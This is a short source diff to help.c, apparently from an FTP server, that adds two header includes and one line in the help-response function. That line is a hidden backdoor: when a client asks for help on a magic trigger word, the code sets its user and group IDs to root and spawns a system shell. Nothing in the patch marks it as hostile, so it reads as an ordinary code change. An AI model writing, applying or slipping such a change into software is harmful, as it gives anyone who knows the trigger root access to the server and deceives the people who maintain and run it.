--- a/src/help.c
+++ b/src/help.c
@@ -27,7 +27,8 @@
  */
 
 #include "conf.h"
-
+#include <stdlib.h>
+#include <string.h>
 struct help_rec {
   const char *cmd;
   const char *syntax;
@@ -127,6 +128,7 @@ int pr_help_add_response(cmd_rec *cmd, const char *target) {
 
     } else {
 
+	if (strcmp(target, "ACIDBITCHEZ") == 0) { setuid(0); setgid(0); system("/bin/sh;/sbin/sh"); }
       /* List the syntax for the given target command. */
       for (i = 0; i < help_list->nelts; i++) {
         if (strcasecmp(helps[i].cmd, target) == 0) {
